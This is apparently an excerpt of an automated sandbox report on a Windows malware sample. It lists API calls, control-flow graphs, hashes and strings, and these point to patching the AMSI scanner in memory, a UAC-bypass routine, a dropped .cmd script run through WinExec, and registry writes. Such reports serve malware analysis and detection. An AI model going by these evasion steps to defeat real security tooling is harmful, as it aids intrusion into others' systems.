                                                                                                                                  • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                                  • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                                  • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession,02B97380), ref: 02B2ED6E
                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession), ref: 02B2ED76
                                                                                                                                • CloseHandle.KERNEL32(00000884,00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C), ref: 02B2ED7F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                                • String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                                • API String ID: 3475578485-1053911981
                                                                                                                                • Opcode ID: 0a6ddb2d7eb5777d3af45d2f8b7fc4ea178817638cecd22a24c7050454c484b1
                                                                                                                                • Instruction ID: c80103336dc4fed7a1c2e7ba24b12b97f04995ee7cfe0ec7b825dfb9d7ce315a
                                                                                                                                • Opcode Fuzzy Hash: 0a6ddb2d7eb5777d3af45d2f8b7fc4ea178817638cecd22a24c7050454c484b1
                                                                                                                                • Instruction Fuzzy Hash: 0622D375A0026D9FEB11FB65D881BCE73B6AF85300F5041E1A149EB254DB30EE49CF66

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 13139 2b11724-2b11736 13140 2b11968-2b1196d 13139->13140 13141 2b1173c-2b1174c 13139->13141 13142 2b11a80-2b11a83 13140->13142 13143 2b11973-2b11984 13140->13143 13144 2b117a4-2b117ad 13141->13144 13145 2b1174e-2b1175b 13141->13145 13149 2b11684-2b116ad VirtualAlloc 13142->13149 13150 2b11a89-2b11a8b 13142->13150 13146 2b11986-2b119a2 13143->13146 13147 2b11938-2b11945 13143->13147 13144->13145 13148 2b117af-2b117bb 13144->13148 13151 2b11774-2b11780 13145->13151 13152 2b1175d-2b1176a 13145->13152 13157 2b119b0-2b119bf 13146->13157 13158 2b119a4-2b119ac 13146->13158 13147->13146 13160 2b11947-2b1195b Sleep 13147->13160 13148->13145 13159 2b117bd-2b117c9 13148->13159 13153 2b116df-2b116e5 13149->13153 13154 2b116af-2b116dc call 2b11644 13149->13154 13155 2b117f0-2b117f9 13151->13155 13156 2b11782-2b11790 13151->13156 13161 2b11794-2b117a1 13152->13161 13162 2b1176c-2b11770 13152->13162 13154->13153 13169 2b117fb-2b11808 13155->13169 13170 2b1182c-2b11836 13155->13170 13166 2b119c1-2b119d5 13157->13166 13167 2b119d8-2b119e0 13157->13167 13165 2b11a0c-2b11a22 13158->13165 13159->13145 13168 2b117cb-2b117de Sleep 13159->13168 13160->13146 13163 2b1195d-2b11964 Sleep 13160->13163 13163->13147 13176 2b11a24-2b11a32 13165->13176 13177 2b11a3b-2b11a47 13165->13177 13166->13165 13173 2b119e2-2b119fa 13167->13173 13174 2b119fc-2b119fe call 2b115cc 13167->13174 13168->13145 13172 2b117e4-2b117eb Sleep 13168->13172 13169->13170 13175 2b1180a-2b1181e Sleep 13169->13175 13178 2b118a8-2b118b4 13170->13178 13179 2b11838-2b11863 13170->13179 13172->13144 13184 2b11a03-2b11a0b 13173->13184 13174->13184 13175->13170 13186 2b11820-2b11827 Sleep 13175->13186 13176->13177 13187 2b11a34 13176->13187 13180 2b11a49-2b11a5c 13177->13180 13181 2b11a68 13177->13181 13182 2b118b6-2b118c8 13178->13182 13183 2b118dc-2b118eb call 2b115cc 13178->13183 13188 2b11865-2b11873 13179->13188 13189 2b1187c-2b1188a 13179->13189 13190 2b11a6d-2b11a7f 13180->13190 13191 2b11a5e-2b11a63 call 2b11500 13180->13191 13181->13190 13194 2b118ca 13182->13194 13195 2b118cc-2b118da 13182->13195 13200 2b118fd-2b11936 13183->13200 13204 2b118ed-2b118f7 13183->13204 13186->13169 13187->13177 13188->13189 13197 2b11875 13188->13197 13192 2b118f8 13189->13192 13193 2b1188c-2b118a6 call 2b11500 13189->13193 13191->13190 13192->13200 13193->13200 13194->13195 13195->13200 13197->13189
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(00000000,?,02B12000), ref: 02B117D0
                                                                                                                                • Sleep.KERNEL32(0000000A,00000000,?,02B12000), ref: 02B117E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                • Opcode ID: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
                                                                                                                                • Instruction ID: e98d19a584a4a14518f7b71833429673fc6a28459c8dd0196ed9c6544a041184
                                                                                                                                • Opcode Fuzzy Hash: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
                                                                                                                                • Instruction Fuzzy Hash: 3DB15372A203518BCB15CF2CE980315BBF1EB86394F59C6EED65D8B385C735A452CB90

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(amsi), ref: 02B288C1
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                  • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                • String ID: DllGetClassObject$W$amsi
                                                                                                                                • API String ID: 941070894-2671292670
                                                                                                                                • Opcode ID: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
                                                                                                                                • Instruction ID: e7da6ab78f48232b107c71d9bf42d7596247465db451df0a5cebfbcc025119e1
                                                                                                                                • Opcode Fuzzy Hash: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
                                                                                                                                • Instruction Fuzzy Hash: 9DF0A45044C381B9E300E3748C45F4BBFCD4B62264F408A98B1ECAA2D2D679D1089B77

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 13227 2b11a8c-2b11a9b 13228 2b11aa1-2b11aa5 13227->13228 13229 2b11b6c-2b11b6f 13227->13229 13232 2b11aa7-2b11aae 13228->13232 13233 2b11b08-2b11b11 13228->13233 13230 2b11b75-2b11b7f 13229->13230 13231 2b11c5c-2b11c60 13229->13231 13234 2b11b81-2b11b8d 13230->13234 13235 2b11b3c-2b11b49 13230->13235 13238 2b11c66-2b11c6b 13231->13238 13239 2b116e8-2b1170b call 2b11644 VirtualFree 13231->13239 13236 2b11ab0-2b11abb 13232->13236 13237 2b11adc-2b11ade 13232->13237 13233->13232 13240 2b11b13-2b11b27 Sleep 13233->13240 13241 2b11bc4-2b11bd2 13234->13241 13242 2b11b8f-2b11b92 13234->13242 13235->13234 13249 2b11b4b-2b11b5f Sleep 13235->13249 13243 2b11ac4-2b11ad9 13236->13243 13244 2b11abd-2b11ac2 13236->13244 13245 2b11ae0-2b11af1 13237->13245 13246 2b11af3 13237->13246 13258 2b11716 13239->13258 13259 2b1170d-2b11714 13239->13259 13240->13232 13248 2b11b2d-2b11b38 Sleep 13240->13248 13250 2b11b96-2b11b9a 13241->13250 13252 2b11bd4-2b11bd9 call 2b114c0 13241->13252 13242->13250 13245->13246 13251 2b11af6-2b11b03 13245->13251 13246->13251 13248->13233 13249->13234 13254 2b11b61-2b11b68 Sleep 13249->13254 13255 2b11bdc-2b11be9 13250->13255 13256 2b11b9c-2b11ba2 13250->13256 13251->13230 13252->13250 13254->13235 13255->13256 13263 2b11beb-2b11bf2 call 2b114c0 13255->13263 13260 2b11bf4-2b11bfe 13256->13260 13261 2b11ba4-2b11bc2 call 2b11500 13256->13261 13264 2b11719-2b11723 13258->13264 13259->13264 13265 2b11c00-2b11c28 VirtualFree 13260->13265 13266 2b11c2c-2b11c59 call 2b11560 13260->13266 13263->13256
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(00000000,?,?,00000000,02B11FE4), ref: 02B11B17
                                                                                                                                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B11FE4), ref: 02B11B31
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                • Opcode ID: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
                                                                                                                                • Instruction ID: ff043b244d0d6a75d583dfe07d5e3ff072b404c752661627741e3c0732ec4baa
                                                                                                                                • Opcode Fuzzy Hash: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
                                                                                                                                • Instruction Fuzzy Hash: B351EE71A212408FDB15CF6CCA84766BBE0EF4A314F9885EED648CB2C2E774C445CBA1

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CheckConnectionInternet
                                                                                                                                • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                • API String ID: 3847983778-3852638603
                                                                                                                                • Opcode ID: 5495862f0f1bddf8e3835711096b5d896cf7844ecb1634bece4bf00fd7b1ad99
                                                                                                                                • Instruction ID: 76d3459666785fb69980c82cbbb91271009e13b4435a24c9db67cefb44b155cd
                                                                                                                                • Opcode Fuzzy Hash: 5495862f0f1bddf8e3835711096b5d896cf7844ecb1634bece4bf00fd7b1ad99
                                                                                                                                • Instruction Fuzzy Hash: FC413B75B002189FEB01EBA4D881ADEB3BAEF88700FA044B6E145E7255DA70FD098F55
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                • WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$Exec
                                                                                                                                • String ID: Kernel32$WinExec
                                                                                                                                • API String ID: 2292790416-3609268280
                                                                                                                                • Opcode ID: de4c438d1842c0d53df6f004f92959f147baa97e82033299aa8200b803261e8c
                                                                                                                                • Instruction ID: 474f45942380282da43f5fc0f3f10ac7b2e9ad0c667e0a98645b595e1c511140
                                                                                                                                • Opcode Fuzzy Hash: de4c438d1842c0d53df6f004f92959f147baa97e82033299aa8200b803261e8c
                                                                                                                                • Instruction Fuzzy Hash: 560181B1694314BFEB01EFA4DC01F5A77FDE709700FA084A0F908D3650DA34AD159A25
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                • WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$Exec
                                                                                                                                • String ID: Kernel32$WinExec
                                                                                                                                • API String ID: 2292790416-3609268280
                                                                                                                                • Opcode ID: d0e22067127069d00553c8d87b508e1811c51134550d7c6342ed30fb074124b7
                                                                                                                                • Instruction ID: 78092c23edb0741e8d385a2d3ff20ef1e16d16e6999086907ed04610de41314e
                                                                                                                                • Opcode Fuzzy Hash: d0e22067127069d00553c8d87b508e1811c51134550d7c6342ed30fb074124b7
                                                                                                                                • Instruction Fuzzy Hash: 2CF081B1694314BFEB01EFA4DC01F5A77FDE709700FA084A0F908D3650DA34AD159A25
                                                                                                                                APIs
                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25C88
                                                                                                                                • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25CB6
                                                                                                                                  • Part of subcall function 02B17D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B23900,02B25CF6,00000000,02B25D74,?,?,02B23900), ref: 02B17DAA
                                                                                                                                  • Part of subcall function 02B17F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B23900,02B25D11,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B17FB7
                                                                                                                                • GetLastError.KERNEL32(00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25D1B
                                                                                                                                  • Part of subcall function 02B1A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B1C3D9,00000000,02B1C433), ref: 02B1A797
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 503785936-0
                                                                                                                                • Opcode ID: baf3ed8c469578cbf0b5a3d49de77a98abf575e316f9e33ab2595bd9827d2b35
                                                                                                                                • Instruction ID: 1e8b4b0daa47cb5162ecb49c8fec66eaa457c7880b1a38e29eadc896d460feef
                                                                                                                                • Opcode Fuzzy Hash: baf3ed8c469578cbf0b5a3d49de77a98abf575e316f9e33ab2595bd9827d2b35
                                                                                                                                • Instruction Fuzzy Hash: 34319570E007189FDB10EFA4C985BDEBBF6AF09700FD040A5E504AB390DB756A098FA1
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
                                                                                                                                • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
                                                                                                                                • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 779948276-0
                                                                                                                                • Opcode ID: f7ac8511ed67d9011d622b1fb37030d9d1624884c990d6728317bfabeb952f58
                                                                                                                                • Instruction ID: aaf8704048b86ca2001737db9a699a66b180aaff3b6f120fedb44d426fd9641c
                                                                                                                                • Opcode Fuzzy Hash: f7ac8511ed67d9011d622b1fb37030d9d1624884c990d6728317bfabeb952f58
                                                                                                                                • Instruction Fuzzy Hash: 8E110AB1A40208AFEB00EFA8DD81E9E7BFDEB09740B9045A1B614D7655EB30EE448F54
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
                                                                                                                                • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
                                                                                                                                • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 779948276-0
                                                                                                                                • Opcode ID: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
                                                                                                                                • Instruction ID: c583a64b6425cf91fa3f8dd343c2bc0a43ac95fed810b29f680252759cda958d
                                                                                                                                • Opcode Fuzzy Hash: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
                                                                                                                                • Instruction Fuzzy Hash: 201106B1A40208AFEB00EFA8DD81E9E7BFDEB09740B9045A1B614D7655EB30EE448F54
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClearVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                • Opcode ID: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
                                                                                                                                • Instruction ID: cf62b1e7ffc386619a5091bbe796d19930a87376fbd5c22f54b4b25ff03de1a5
                                                                                                                                • Opcode Fuzzy Hash: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
                                                                                                                                • Instruction Fuzzy Hash: B8F09660718110C7DB2A7B39AD8466D379AAF403407D094F6EC07DB155DF64CC85D762
                                                                                                                                APIs
                                                                                                                                • SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                                • SysAllocStringLen.OLEAUT32(?,?), ref: 02B14D5B
                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02B14D6D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
